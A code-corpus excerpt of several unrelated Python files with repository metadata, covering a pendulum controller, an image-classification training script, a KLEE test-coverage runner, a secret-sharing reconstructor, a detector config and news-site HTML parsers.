+ self.L_h @ (y_m-self.C_h @ x2_hat)
return x2hat_dot
#------------------------------------------------------------------------------
def saturate(self,u):
if abs(u) > self.limit:
u = self.limit*np.sign(u)
return u
def integrateError(self, error):
self.integrator = self.integrator \
+ (self.Ts/2.0)*(error + self.error_d1)
self.error_d1 = error
#-------------------------------------------------------------------------------------
'''
import numpy as np
import pendulumParamHW13 as P
class pendulumController:
def __init__(self):
self.x_hat = np.array([
[0.0], # initial estimate for z_hat
[0.0], # initial estimate for theta_hat
[0.0], # initial estimate for z_hat_dot
[0.0]]) # initial estimate for theta_hat_dot
self.F_d1 = 0.0 # Computed Force, delayed by one sample
self.integrator = 0.0 # integrator
self.error_d1 = 0.0 # error signal delayed by 1 sample
self.K = P.K # state feedback gain
self.ki = P.ki # integrator gain
self.L = P.L # observer gain
self.A = P.A # system model
self.B = P.B
self.C = P.C
self.limit = P.F_max # Maximum force
self.Ts = P.Ts # sample rate of controller
def update(self, z_r, y):
# update the observer and extract z_hat
x_hat = self.update_observer(y)
z_hat = x_hat.item(0)
# integrate error
error = z_r - z_hat
self.integrate_error(error)
# Compute the state feedback controller
F_unsat = -self.K*x_hat - self.ki*self.integrator
F_sat = self.saturate(F_unsat.item(0))
self.F_d1 = F_sat
return F_sat, x_hat
def update_observer(self, y_m):
# update the observer using RK4 integration
F1 = self.observer_f(self.x_hat, y_m)
F2 = self.observer_f(self.x_hat + self.Ts / 2 * F1, y_m)
F3 = self.observer_f(self.x_hat + self.Ts / 2 * F2, y_m)
F4 = self.observer_f(self.x_hat + self.Ts * F3, y_m)
self.x_hat += self.Ts / 6 * (F1 + 2 * F2 + 2 * F3 + F4)
return self.x_hat
def observer_f(self, x_hat, y_m):
# xhatdot = A*xhat + B*u + L(y-C*xhat)
xhat_dot = self.A @ x_hat \
+ self.B * self.F_d1 \
+ self.L @ (y_m-self.C @ x_hat)
return xhat_dot
def integrate_error(self, error):
self.integrator = self.integrator \
+ (self.Ts/2.0)*(error + self.error_d1)
self.error_d1 = error
def saturate(self,u):
if abs(u) > self.limit:
u = self.limit*np.sign(u)
return u
'''
| UTF-8 | Python | false | false | 7,378 | py | 22 | vtolController.py | 21 | 0.504608 | 0.483464 | 0 | 213 | 33.633803 | 87 |
OpenHack-Eyes/Eyes_WebServer | 17,480,516,921,188 | af5ec875f82ee7f58f9908259a0fa76cfeb33b73 | 363811bab819cde2d1ea0e6793db48a46b69032d | /app/ObjectMapper.py | e363a393d347403b6776e2c28487d945e3ef4bf3 | []
| no_license | https://github.com/OpenHack-Eyes/Eyes_WebServer | 6342166887fa168976fd138a07165a20afb6a1dc | 8a7ecbfadd094762b116ca73e6760c680a6019bb | refs/heads/master | 2020-03-21T20:45:27.571508 | 2018-06-30T02:55:39 | 2018-06-30T02:55:39 | 139,026,174 | 0 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null | from app.Model import HistoryVO, PatientVO
def get_histories(histories):
history_list = []
for history in histories: # a에서 안쪽 리스트를 꺼냄
history = HistoryVO.HistoryVO(history[0], history[1], history[2], history[3], history[4], history[5], history[6])
history_list.append(history.serialize())
return history_list
def get_patient(patient_info):
return PatientVO.PatientVO(patient_info) | UTF-8 | Python | false | false | 437 | py | 11 | ObjectMapper.py | 7 | 0.702638 | 0.685851 | 0 | 13 | 31.153846 | 121 |
gavin0430/Visual-Recognition-using-Deep-Learning | 5,677,946,791,583 | 6cd84677367ecde58444705dfa7c4fd0aa940d06 | 0b9f931ad846b7d75aba1895251223ef5874cbd9 | /lab1/HW1.py | c271a6915fc8b47b014ac3454e7c4f5192b78b0f | []
| no_license | https://github.com/gavin0430/Visual-Recognition-using-Deep-Learning | 89486064fb1a3b0b47f87ceb933f42b879bfccc1 | 1a96329e65a9850adf797ef6922417266b018fe8 | refs/heads/master | 2020-08-07T22:03:46.756427 | 2019-12-25T15:47:31 | 2019-12-25T15:47:31 | 213,599,424 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/env python
# coding: utf-8
# In[1]:
import os
import time
import numpy as np
import pandas as pd
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.utils.data import DataLoader
from torchvision import datasets
from torchvision import transforms
import torchvision.models as models
import matplotlib.pyplot as plt
from PIL import Image
#os.environ['CUDA_LAUNCH_BLOCKING'] = "1"
# In[2]:
NUM_CLASSES = 13
BATCH_SIZE = 20
LEARNING_RATE = 0.001
NUM_EPOCHS = 300
DEVICE = 'cuda:1'
device = torch.device('cuda')
# In[3]:
#####Load Data###########
data_transform = transforms.Compose([
transforms.RandomResizedCrop(224),
transforms.RandomHorizontalFlip(),
transforms.Grayscale(num_output_channels=3),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406],std=[0.229, 0.224, 0.225])
])
training_data = datasets.ImageFolder(root='./train',transform=data_transform)
train_loader = torch.utils.data.DataLoader(training_data, batch_size=BATCH_SIZE, shuffle=True, num_workers=4)
for images, labels in train_loader:
print('Image batch dimensions:', images.shape)
print('Image label dimensions:', labels.shape)
#print(images)
#images = images.cuda()
break
# In[ ]:
###Using different model
model = models.resnet50(pretrained=True, progress=True)
model.fc = nn.Linear(2048, NUM_CLASSES)
#print(torch.device('cuda'))
#model.to(device)
model = model.cuda()
print(model)
optimizer = torch.optim.Adam(model.parameters(), lr=LEARNING_RATE)
# In[4]:
model = models.resnext101_32x8d(pretrained=True, progress=True)
model.fc = nn.Linear(2048, NUM_CLASSES)
print(model)
model = model.cuda()
optimizer = torch.optim.Adam(model.parameters(), lr=LEARNING_RATE)
# In[ ]:
model = models.wide_resnet101_2(pretrained=True, progress=False)
model.fc = nn.Linear(2048, NUM_CLASSES)
print(model)
model = model.cuda()
optimizer = torch.optim.Adam(model.parameters(), lr=LEARNING_RATE)
# In[5]:
#model = torch.load('./resnext101_32x8d')
def compute_accuracy(model, data_loader, device):
correct_pred, num_examples = 0, 0
for i, (features, targets) in enumerate(data_loader):
#features = features.to(device)
#targets = targets.to(device)
features = features.cuda()
targets = targets.cuda()
#logits, probas = model(features)
logits = model(features)
probas = F.softmax(logits, dim=1)
_, predicted_labels = torch.max(probas, 1)
num_examples += targets.size(0)
correct_pred += (predicted_labels == targets).sum()
return correct_pred.float()/num_examples * 100
def adjust_learning_rate(optimizer, epoch):
"""Sets the learning rate to the initial LR decayed by 10 every 20 epochs"""
lr = LEARNING_RATE * (0.1 ** (epoch // 20))
for param_group in optimizer.param_groups:
param_group['lr'] = lr
best_acc = 0.93
start_time = time.time()
for epoch in range(NUM_EPOCHS):
model.train()
for batch_idx, (features, targets) in enumerate(train_loader):
#features = features.to(DEVICE)
#targets = targets.to(DEVICE)
features = features.cuda()
targets = targets.cuda()
### FORWARD AND BACK PROP
#logits, probas = model(features)
logits = model(features)
probas = F.softmax(logits, dim=1)
#print(logits)
cost = F.cross_entropy(logits, targets)
optimizer.zero_grad()
cost.backward()
### UPDATE MODEL PARAMETERS
optimizer.step()
adjust_learning_rate(optimizer, epoch)
### LOGGING
if not batch_idx % 30:
print ('Epoch: %03d/%03d | Batch %04d/%04d | Cost: %.4f'
%(epoch+1, NUM_EPOCHS, batch_idx,
len(train_loader), cost))
model.eval()
with torch.set_grad_enabled(False): # save memory during inference
acc = compute_accuracy(model, train_loader, device=DEVICE)
print('Epoch: %03d/%03d | Train: %.3f%%' % (
epoch+1, NUM_EPOCHS, acc))
if acc > best_acc:
torch.save(model, './resnext101_32x8d_300')
best_acc = acc
print("model save at acc = ",acc)
print('Time elapsed: %.2f min' % ((time.time() - start_time)/60))
print('Total Training Time: %.2f min' % ((time.time() - start_time)/60))
# In[8]:
###Testing##############
import csv
model = torch.load('./resnext101_32x8d_300')
testing_data = datasets.ImageFolder(root='./test1',transform=data_transform)
test_loader = torch.utils.data.DataLoader(testing_data, batch_size=1, shuffle=False, num_workers=4)
label = ['bedroom','coast','forest','highway','insidecity','kitchen','livingroom','mountain','office','opencountry','street','suburb','tallbuilding']
#print(testing_data[1039])
k = 0
with open('output5.csv', 'w', newline='') as csvfile:
writer = csv.writer(csvfile)
writer.writerow(['id','label'])
for i, (images, labels) in enumerate(test_loader):
images = images.cuda()
model.eval()
logits = model(images)
probas = F.softmax(logits, dim=1)
_, predicted_labels = torch.max(probas, 1)
#print(predicted_labels)
image_id = 'image_' + "%04d" % k
#print(image_id)
print(image_id,label[predicted_labels[0].item()])
writer.writerow([image_id,label[predicted_labels[0].item()]])
#break
k+=1
'''
with open('output.csv', 'w', newline='') as csvfile:
writer = csv.writer(csvfile)
writer.writerow(['id','label'])
for i, (images, labels) in enumerate(test_loader):
images = images.cuda()
model.eval()
logits = model(images)
probas = F.softmax(logits, dim=1)
_, predicted_labels = torch.max(probas, 1)
#print(predicted_labels[0].item())
image_id = 'image_' + "%04d" % i
print()
for j in range(10):
writer.writerow([image_id,label[]])
break
'''
# In[7]:
torch.save(model, './resnext101_32x8d_300_last')
#rr = torch.load('./resnet50_first_try')
#rr.eval()
#print(rr)
| UTF-8 | Python | false | false | 6,221 | py | 5 | HW1.py | 2 | 0.621926 | 0.593634 | 0 | 222 | 27.018018 | 149 |
MinseokJGit/dd-klee | 2,370,821,967,776 | cc849ea8f4fbeb04f69171d84ac1889c7b913a13 | 880451e55a554b4e730fb838faedbec4f6be8037 | /paradyse/subscripts/check_w.py | 038572f150e07051d08450c547463c68e55a0de4 | []
| no_license | https://github.com/MinseokJGit/dd-klee | a61c09bbd3fb3cedda651fa65a96f4b62c9417b0 | eb23ae83b5f8432ee693e43ab98d22311d359d4a | refs/heads/master | 2023-09-01T15:31:12.648356 | 2021-01-14T11:41:14 | 2021-01-14T11:41:14 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from multiprocessing import Process, Value, Queue
import signal
import subprocess
import os
import sys
import random
import json
import argparse
import datetime
import shutil
import re
import glob
import subprocess
from subprocess import Popen, PIPE
import time
from threading import Timer
import math
start_time = datetime.datetime.now()
date = start_time.strftime('%m')
__run_count = Value('i', 0)
configs = {
'script_path': os.path.abspath(os.getcwd()),
'date': date,
'b_dir': os.path.abspath('../build/'),
'top_dir': os.path.abspath('../experiments/')
}
def Timeout_Checker(total_time, init_time):
init_time=datetime.datetime.strptime(init_time,'%Y-%m-%d %H:%M:%S.%f')
current_time = datetime.datetime.now()
elapsed_time = (current_time-init_time).total_seconds()
if total_time < elapsed_time:
os.chdir(configs['script_path'])
print ("#############################################")
print ("################Time Out!!!!!################")
print ("#############################################")
return 100
else:
return 0
def load_pgm_config(config_file):
with open(config_file, 'r') as f:
parsed = json.load(f)
return parsed
def gen_run_cmd(pgm, weight_idx, trial, a_budget, idx):
argv = "--sym-args 0 1 10 --sym-args 0 2 2 --sym-files 1 8 --sym-stdin 8 --sym-stdout"
log = "logs/" + "__".join([pgm+"check"+trial, str(weight_idx), "ours", str(idx)]) + ".log"
weight = configs['script_path'] +"/"+trial+ "_weights/" + str(weight_idx) + ".weight"
run_cmd = " ".join([configs['b_dir']+"/bin/klee",
"-only-output-states-covering-new", "--simplify-sym-indices", "--output-module=false",
"--output-source=false", "--output-stats=false", "--disable-inlining",
"--optimize", "--use-forked-solver", "--use-cex-cache", "--libc=uclibc",
"--posix-runtime", "-env-file="+configs['b_dir']+"/../test.env",
"--max-sym-array-size=4096", "--max-memory-inhibit=false",
"--switch-type=internal", "--use-batching-search", "--batch-instructions=10000",
"--watchdog -max-time="+a_budget, "-search=param",
"-weight="+weight, pgm+".bc", argv])
return (run_cmd, log)
def Cal_Coverage(cov_file):
coverage=0
with open(cov_file, 'r') as f:
lines= f.readlines()
for line in lines:
if "Taken at least" in line:
data=line.split(':')[1]
percent=float(data.split('% of ')[0])
total=int((data.split('% of ')[1]).strip())
cov=int(percent*total/100)
coverage=coverage+cov
return coverage
def Kill_Process(process, testcase):
with open(configs['script_path']+"/killed_history", 'a') as f:
f.write(testcase+"\n")
os.killpg(os.getpgid(process.pid), signal.SIGTERM)
print("timeover!")
def run_all(pconfig, n_parallel, pgm, n_iter, weights, trial, total_time, init_time, a_budget, ith_trial):
top_dir = "/".join([configs['top_dir'], ith_trial+"__check"+trial, pgm])
log_dir = top_dir + "/" + "__".join([pgm,"check"+trial, "logs"])
if not os.path.exists(log_dir):
os.makedirs(log_dir)
Tasks=[]
for w_idx in weights:
for i in range(1,n_iter+1):
Tasks.append((w_idx,i))
A_core_task = int(math.floor(len(Tasks)/n_parallel))
remain_tasks= len(Tasks)%n_parallel
idx_list=[0]
acc_idx=0
for i in range(0,n_parallel):
if i < remain_tasks:
acc_idx=acc_idx+A_core_task+1
else:
acc_idx=acc_idx+A_core_task
idx_list.append(acc_idx)
procs = []
rets = []
q = Queue()
for group_id in range(0,n_parallel):
subTask=Tasks[idx_list[group_id]:idx_list[group_id+1]]
procs.append(Process(target=running_function, args=(pconfig, pgm, top_dir, log_dir, subTask, group_id+1, trial, total_time, a_budget, init_time, q)))
for p in procs:
p.start()
for p in procs:
ret = q.get()
rets.append(ret)
if 100 in rets:
sys.exit(100)
def running_function(pconfig, pgm, top_dir, log_dir, subTask, group_id, trial, total_time, a_budget, init_time, queue):
instance_dir = top_dir + "/" + str(group_id)
dir_cp_cmd = " ".join(["cp -r", pconfig['pgm_dir'], instance_dir])
os.system(dir_cp_cmd)
tc_location=instance_dir+"/"+pconfig['exec_dir']
os.chdir(tc_location)
if not os.path.exists("logs"):
os.mkdir("logs")
cnt=0
rc=0
for task in subTask:
weight_idx=task[0]
idx=task[1]
os.chdir(tc_location)
(run_cmd, log) = gen_run_cmd(pgm, weight_idx, trial, a_budget, idx)
rc=Timeout_Checker(total_time, init_time)
if rc==100:
break
os.system(run_cmd)
klee_dir ="klee-out-"+str(cnt)
os.chdir(klee_dir)
testcases= glob.glob("*.ktest")
testcases.sort(key=lambda x:float((x.split('.ktest')[0]).split('test')[1]))
gcov_location="/".join([configs['script_path'], pconfig['gcov_path']+str(group_id), pconfig['exec_dir']])
os.chdir(gcov_location)
rm_cmd = " ".join(["rm", pconfig['gcov_file'], pconfig['gcda_file'], "cov_result"])
os.system(rm_cmd)
log_name = pgm+trial+"__check"+str(weight_idx)+"__"+str(idx)+".log"
klee_dir_location="/".join([tc_location, klee_dir])
for tc in testcases:
run_cmd=[configs['b_dir']+"/bin/klee-replay", "./"+pgm, klee_dir_location+"/"+tc]
proc = subprocess.Popen(run_cmd, preexec_fn=os.setsid, stdout=PIPE, stderr=PIPE)
my_timer = Timer(0.1, Kill_Process, [proc, tc_location+"/"+tc])
try:
my_timer.start()
stdout, stderr = proc.communicate()
lines = stderr.splitlines()
finally:
my_timer.cancel()
gcov_file="cov_result"
gcov_cmd=" ".join(["gcov", "-b", pconfig['gcda_file'], "> "+gcov_file])
os.system(gcov_cmd)
coverage=Cal_Coverage(gcov_file)
with open(log_name, "a") as tf:
tf.write(str(weight_idx)+": "+str(coverage)+"\n")
cnt = cnt+1
mv_cmd = " ".join(["mv", log_name, log_dir])
os.system(mv_cmd)
os.chdir(tc_location)
os.chdir(configs['script_path'])
queue.put(rc)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("pgm_config")
parser.add_argument("n_parallel")
parser.add_argument("n_iter")
parser.add_argument("trial")
parser.add_argument("-l", type=lambda s:[int(item) for item in s.split(',')])
parser.add_argument("total_time")
parser.add_argument("init_time")
parser.add_argument("a_budget")
parser.add_argument("ith_trial")
args = parser.parse_args()
pconfig = load_pgm_config(args.pgm_config)
n_parallel = int(args.n_parallel)
pgm = pconfig['pgm_name']
n_iter = int(args.n_iter)
trial = args.trial
weights = args.l
total_time = int(args.total_time)
init_time = args.init_time
a_budget = args.a_budget
ith_trial= args.ith_trial
run_all(pconfig, n_parallel, pgm, n_iter, weights, trial, total_time, init_time, a_budget, ith_trial)
| UTF-8 | Python | false | false | 7,562 | py | 39 | check_w.py | 27 | 0.554351 | 0.546681 | 0 | 217 | 33.847926 | 157 |
zzf-technion/EduParser | 3,298,534,930,244 | b0676d44d1c5d2cf44cb8da28eebca6614f64bba | 0140dbcd57d17ba82f32ead44cebe61f0e25a91a | /eduParser/out/ustc/信息科学技术学院/MyHandler.py | 2415afb07658ff4a31c2e2e7c194bf4ee7f39f8b | []
| no_license | https://github.com/zzf-technion/EduParser | 03b59d1e614c2cb21fdaf8339c6c06090545f4ae | 05f17dbc7e5eb3d063eeac01e266646b5d073556 | refs/heads/master | 2020-06-16T14:52:48.288113 | 2016-01-06T00:50:27 | 2016-01-06T00:50:27 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # coding=utf-8
import os
from models import Employee
from bs4 import BeautifulSoup
from config import Config
from mparser import ProfileParser
from mparser import get_doc_bySelenium
import re
# @brief: 函数将过滤结果转化为Employee数据
# @tag: 输入为待处理的BeautifulSoup的tag对象
# @output:输出employee
def handler(tag):
tds = tag.find_all(name='td')
if not tds or len(tds) < 5:
return None
department = tds[0].get_text()
if not department or len(department) == 0:
return None
department = department.strip()
name = tds[1].get_text().strip()
name = ''.join(name.split())
url = ''
ass = tds[1].find_all('a')
if ass:
url = ass[0]['href']
title = tds[2].get_text() or ''
title = title.strip()
email = ''
research = ''
tel = ''
if len(tds) == 5:
email = tds[3].get_text() or ''
email = email.strip()
tel = tds[4].get_text() or ''
tel = tel.strip()
elif len(tds) == 6:
research = tds[3].get_text() or ''
research = research.strip()
email = tds[4].get_text() or ''
email = email.strip()
tel = tds[5].get_text() or ''
tel = tel.strip()
return Employee(name=name, email=email, tel=tel, research = research, departments=department)
| UTF-8 | Python | false | false | 1,338 | py | 176 | MyHandler.py | 21 | 0.584496 | 0.572093 | 0 | 54 | 22.888889 | 97 |
luqiang6q/mobile_detect | 10,402,410,814,467 | dc4468e93e8cf6581bfe4e32f8d2ba26c9b265c6 | 923a0c9396169f9c7831efe943a3637b63a4085c | /configs/mbv3_config.py | b9e3fac701f296f648f37f20bd0fcc5e020f431c | []
| no_license | https://github.com/luqiang6q/mobile_detect | 00e6bef9405a8010f6072c1a61422326d88eafaa | eceda8d262744932eac7eff1d98972c785419e3a | refs/heads/master | 2022-04-05T06:32:03.657194 | 2020-02-21T03:12:36 | 2020-02-21T03:12:36 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #-*-coding:utf-8-*-
import os
import numpy as np
from easydict import EasyDict as edict
config = edict()
os.environ["CUDA_VISIBLE_DEVICES"] = "0" ##if u use muti gpu set them visiable there and then set config.TRAIN.num_gpu
config.TRAIN = edict()
#### below are params for dataiter
config.TRAIN.process_num = 5 ### process_num for data provider
config.TRAIN.prefetch_size = 20 ### prefect Q size for data provider
config.TRAIN.num_gpu = 1 ##match with os.environ["CUDA_VISIBLE_DEVICES"]
config.TRAIN.batch_size = 32 ###A big batch size may achieve a better result, but the memory is a problem
config.TRAIN.log_interval = 10
config.TRAIN.epoch = 300 ###just keep training , evaluation shoule be take care by yourself,
### generally 10,0000 iters is enough
config.TRAIN.train_set_size=13000 ###widerface train size
config.TRAIN.val_set_size=3200 ###widerface val size
config.TRAIN.iter_num_per_epoch = config.TRAIN.train_set_size // config.TRAIN.num_gpu // config.TRAIN.batch_size
config.TRAIN.val_iter=config.TRAIN.val_set_size// config.TRAIN.num_gpu // config.TRAIN.batch_size
config.TRAIN.lr_value_every_step = [0.00001,0.0001,0.001,0.0001,0.00001,0.000001] ##warm up is used
config.TRAIN.lr_decay_every_step = [500,1000,60000,80000,100000]
config.TRAIN.opt='adam'
config.TRAIN.weight_decay_factor = 5.e-4 ##l2 regular
config.TRAIN.vis=False ##check data flag
config.TRAIN.norm='BN' ##'GN' OR 'BN'
config.TRAIN.lock_basenet_bn=False
config.TRAIN.frozen_stages=-1 ##no freeze
config.DATA = edict()
config.DATA.root_path=''
config.DATA.train_txt_path='train.txt'
config.DATA.val_txt_path='val.txt'
config.DATA.num_category=1 ###face 1 voc 20 coco 80
config.DATA.num_class = config.DATA.num_category + 1 # +1 background
config.DATA.PIXEL_MEAN = [127.] ###rgb
config.DATA.PIXEL_STD = [127.]
config.DATA.hin = 480 # input size
config.DATA.win = 480
config.DATA.channel = 3
config.DATA.max_size=[config.DATA.hin,config.DATA.win] ##h,w
config.DATA.cover_small_face=10 ###cover the small faces
config.DATA.mutiscale=False #if muti scale set False then config.DATA.MAX_SIZE will be the inputsize
config.DATA.scales=(320,640)
# anchors -------------------------
config.ANCHOR = edict()
config.ANCHOR.rect=True
config.ANCHOR.rect_longer=False #### make anchor h/w=1.5
config.ANCHOR.ANCHOR_STRIDE = 16
config.ANCHOR.ANCHOR_SIZES = (32,128,512) # sqrtarea of the anchor box
config.ANCHOR.ANCHOR_STRIDES = (8, 16, 32) # strides for each FPN level. Must be the same length as ANCHOR_SIZES
config.ANCHOR.ANCHOR_RATIOS = (1., 4.) ###### 1:2 in size,
config.ANCHOR.POSITIVE_ANCHOR_THRESH = 0.35
config.ANCHOR.NEGATIVE_ANCHOR_THRESH = 0.35
config.ANCHOR.AVG_MATCHES=20
config.ANCHOR.super_match=True
##mobilenetv3 as basemodel
config.MODEL = edict()
config.MODEL.continue_train=False ### revover from a trained model
config.MODEL.model_path = './model/' # save directory
config.MODEL.net_structure='MobilenetV3' ######'resnet_v1_50,resnet_v1_101,MobilenetV2
config.MODEL.pretrained_model='./v3-small-minimalistic_224_1.0_float/ema/model-498000'
config.MODEL.fpn_dims=[128,128,128]
config.MODEL.cpm_dims=[128,128,128]
config.MODEL.focal_loss=True
config.MODEL.fpn=True
config.MODEL.max_negatives_per_positive= 3.0
config.MODEL.deployee= None ### tensorflow, mnn, coreml
if config.MODEL.deployee:
config.TRAIN.batch_size = 1
config.MODEL.iou_thres= 0.5
config.MODEL.score_thres= 0.5
config.MODEL.max_box= 10 | UTF-8 | Python | false | false | 3,788 | py | 9 | mbv3_config.py | 7 | 0.667371 | 0.615892 | 0 | 93 | 39.741935 | 127 |
gloriamaris/designsouth-reg | 5,841,155,544,621 | f15be12ae2341b7bea6195dc0ba486785528f751 | 45a81062272778f3da70f1a00e39913527e93d1f | /designsouthreg/local/__init__.py | 6cb49dceec514f1006a65c832dadfd8849c7e632 | []
| no_license | https://github.com/gloriamaris/designsouth-reg | b92d69fd8a280aaf8525eec7056981482368967e | dc86214a41fec548c91469ae393a6a45e2144811 | refs/heads/master | 2020-04-08T19:52:19.163144 | 2018-11-30T15:39:55 | 2018-11-30T15:39:55 | 159,674,159 | 1 | 0 | null | false | 2018-11-29T16:12:47 | 2018-11-29T13:55:49 | 2018-11-29T15:02:28 | 2018-11-29T16:12:46 | 12 | 0 | 0 | 0 | Python | false | null | /home/monique/Documents/Projects/Personal/designsouthreg/designsouthreg/__init__.py | UTF-8 | Python | false | false | 83 | py | 7 | __init__.py | 6 | 0.843373 | 0.843373 | 0 | 1 | 83 | 83 |
nguyenduchien1994/Secret_Sharing | 14,774,687,530,419 | b2766cbcd1a960b582b8f6b31b69dd101957d938 | 0c0b8edd6947cf0fcd66ff74d8f0242e9182645f | /SecretRecon.py | aed365eabc293e5f1933cdf0c5f7fa87e97baa8d | []
| no_license | https://github.com/nguyenduchien1994/Secret_Sharing | ae806a85b736574a5e734a5f2be5808d8066fa3d | d3ea632113f7d17c925d98f7062e69078712ecb3 | refs/heads/master | 2020-04-05T11:22:30.706424 | 2017-07-07T16:47:45 | 2017-07-07T16:47:45 | 81,397,311 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import sys
sys.path.append("/ad/eng/users/h/e/heinous/Desktop/Research/Secret_Sharing/Finite-Field")
sys.path.append("/home/heinous/Desktop/Research/SecretSharing/Secret_Sharing/Finite-Field")
import ffield
class SecretRecon():
def __init__(self,f):
self.f = f
self.F = ffield.FField(self.f)
def recon_2(self,chosen):
denom = self.F.Add(int(chosen.keys()[0],2),int(chosen.keys()[1],2))
nom = self.F.Add(int(chosen.values()[0],2),int(chosen.values()[1],2))
E = self.F.Multiply(nom,self.F.Inverse(denom))
return ('{0:0'+str(self.f)+'b}').format(E)
def recon_3(self,chosen):
E = 0
for x in chosen.keys():
D = chosen[x]
nom = int(D,2)
denom = 1
for y in chosen.keys():
if y != x:
denom = self.F.Multiply(denom,self.F.Add(int(x,2),int(y,2)))
E = self.F.Add(E,self.F.Multiply(nom,self.F.Inverse(denom)))
return ('{0:0'+str(self.f)+'b}').format(E)
| UTF-8 | Python | false | false | 1,029 | py | 16 | SecretRecon.py | 7 | 0.559767 | 0.541302 | 0 | 32 | 31.15625 | 91 |
ibraaaa/news-credibility | 644,245,096,681 | 55aac651386100719cf558f569cfd58c4d796867 | e914c69576b89833b7ead49569701f4a97958f3a | /src/python/parsers/html_parser.py | dacff6c95db50c53c959775baed79d8b0bc734bb | [
"Apache-2.0"
]
| permissive | https://github.com/ibraaaa/news-credibility | 3c439be20db18d3f364f3e19b460d952ae1272b8 | cae1009d9def17c058342c3dee969f2babcd0c9e | refs/heads/master | 2020-04-15T08:14:50.190724 | 2019-01-07T00:20:35 | 2019-01-07T00:20:35 | 164,347,496 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/python
# -*- coding: utf-8 -*-
import lxml.html
import os.path
import threading
import traceback
import util.const as CONST
import util.db as db
import util.helper as helper
from multiprocessing import Pool
class HTMLParser(object):
def __parse_shorouk(self, html_):
page_ = lxml.html.fromstring(html_)
title_ = page_.find_class('right')
data_ = []
# Get article title.
for x in title_:
text_nodes_ = x.xpath('h1/child::text() | h3/child::text()')
title_text_ = ''
for text_node_ in text_nodes_:
if text_node_:
title_text_ += text_node_.encode('utf-8').lstrip() + ' '
if title_text_: data_.append(title_text_)
#CHECK: ../data/rss/html/shorouknews/accidents/67/2013-02-21%2020:10:00%2367a7c33d-ace1-4fa9-aa3c-a227a53714ec.html
# Fixed manual for now
body_ = page_.find_class('rightContent-newSize')
# Get article body.
for x in body_:
text_nodes_ = x.xpath('p/descendant::text()')
for text_node_ in text_nodes_:
if text_node_:
data_.append(text_node_.encode('utf-8'))
# helper.WRITE_FILE('/home/ibraaaa/Desktop/test_1.txt', '\n'.join(data_))
return '\n'.join(data_)
def __parse_cnn_arabic(self, html_):
page_ = lxml.html.fromstring(html_)
title_ = page_.xpath("//div[@class='cnn_storyarea']/h1/child::text()")
data_ = []
for text_ in title_:
if text_: data_.append(text_.encode('utf-8'))
body_ = page_.xpath("//div[@class='cnn_strycntntrgt']/p/descendant::text()")
for text_ in body_:
if text_: data_.append(text_.encode('utf-8'))
#helper.WRITE_FILE('/home/ibraaaa/Desktop/test_1.txt', '\n'.join(data_))
return '\n'.join(data_)
def __parse_akhbarelyomgate(self, html_):
"""Parses HTML from 'Akhbar El-Yom'. Articles are laid out in tables.
Article title can be found near by an element with CSS class name
'articleTitle', we get this and then go up one step typically to
the parent row including the element with this CSS class and then
get all text nodes in the descendants
Similar approach is done for the article body but the CSS class is
'articleBody'
"""
page_ = lxml.html.fromstring(html_)
elements_ = page_.find_class('articleTitle')
data_ = []
for e in elements_:
title_ = e.xpath('parent::node()/descendant::text()')
for text_ in title_:
text_ = text_.encode('utf-8').strip()
if text_: data_.append(text_)
break;
elements_ = page_.find_class('articleBody')
for e in elements_:
body_ = e.xpath('parent::node()/descendant::text()')
for text_ in body_:
text_ = text_.encode('utf-8').strip()
if text_: data_.append(text_)
break;
return '\n'.join(data_)
def __parse_almasryalyoum(self, html_):
page_ = lxml.html.fromstring(html_)
elements_ = page_.find_class('custom-article-title')
data_ = []
for e in elements_:
title_ = e.xpath('descendant-or-self::text()')
for text_ in title_:
text_ = text_.encode('utf-8').strip()
if text_: data_.append(text_)
#elements_ = page_.find_class('panel-pane pane-node-body')
#for e in elements_:
# body_ = e.xpath("descendant-or-self::text()")
# for text_ in body_:
# text_ = text_.encode('utf-8').strip()
# if text_: data_.append(text_)
body_ = page_.xpath("//div[@class='panel-pane pane-node-body']/div[@class='pane-content']/div | //div[@class='panel-pane pane-node-body']/div[@class='pane-content']/p")
for b in body_:
ignore = False
for attribute in b.xpath("@*"):
if 'embeded-read-also' in attribute:
ignore = True
if ignore: continue
data_.extend([t.encode('utf-8').strip() for t in b.xpath("descendant-or-self::text()") if t])
#helper.WRITE_FILE('/home/ibraaaa/Desktop/test_1.txt', '\n'.join(data_))
return '\n'.join(data_)
def __parse_elfagr(self, html_):
page_ = lxml.html.fromstring(html_)
elements_ = page_.get_element_by_id("ctl00_ContentPlaceHolder1_maintd")
if not elements_: elements_ = page_.find_class('DetailsPageContent') # the check seems wrong
data_ = []
for e in elements_:
text_ = e.text_content().encode('utf-8').strip()
if text_ and text_[-2:] != 'PM' and text_[-2:] != 'AM': data_.append(text_)
#helper.WRITE_FILE('/home/ibraaaa/Desktop/test_1.txt', '\n'.join(data_))
return '\n'.join(data_)
def __parse_english_ahram(self, html_):
page_ = lxml.html.fromstring(html_)
exp = "//div[@id='ctl00_ContentPlaceHolder1_divLeftTitle']";
# Title
elements_ = page_.xpath(exp + "/div[@id='ctl00_ContentPlaceHolder1_hd']/descendant::text()")
# Brief
elements_.extend(page_.xpath(exp + "/div[@id='ctl00_ContentPlaceHolder1_bref']/descendant::text()"))
data_ = []
for e in elements_:
e = e.encode('utf-8').strip()
if e: data_.append(e)
exp = "//div[@id='ctl00_ContentPlaceHolder1_divContent']/"
elements_ = page_.xpath(exp + "child::text()")
elements_.extend(page_.xpath(exp + "p/descendant::text()"))
for e in elements_:
e = e.encode('utf-8').strip()
if "short link:" in e.lower(): continue
if e: data_.append(e)
#helper.WRITE_FILE('/home/ibraaaa/Desktop/test_1.txt', '\n'.join(data_))
return '\n'.join(data_)
def __parse_fjp(self, html_):
page_ = lxml.html.fromstring(html_)
title_ = page_.xpath("//div[@id='PressRTitles']/descendant::text()")
data_ = []
for t in title_:
t = t.encode('utf-8').strip()
if t: data_.append(t)
